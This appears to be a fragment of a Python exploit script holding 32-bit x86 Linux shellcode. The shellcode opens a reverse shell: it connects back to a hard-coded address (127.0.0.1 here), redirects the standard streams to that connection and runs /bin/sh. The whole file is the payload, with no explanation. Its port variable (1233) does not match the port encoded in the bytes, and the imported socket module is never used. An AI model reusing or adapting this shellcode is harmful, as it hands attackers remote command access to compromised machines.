#!/usr/bin/env python
# encoding: utf-8
import socket

IP='127.0.0.1'
port=1233

sc =    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e"
sc +=   "\x68\x7f\x00\x00\x01"    #ip
sc +=	"\x66\x68\x56\xd1"  #port
sc +=   "\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87"
sc +=	"\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68"
sc +=	"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
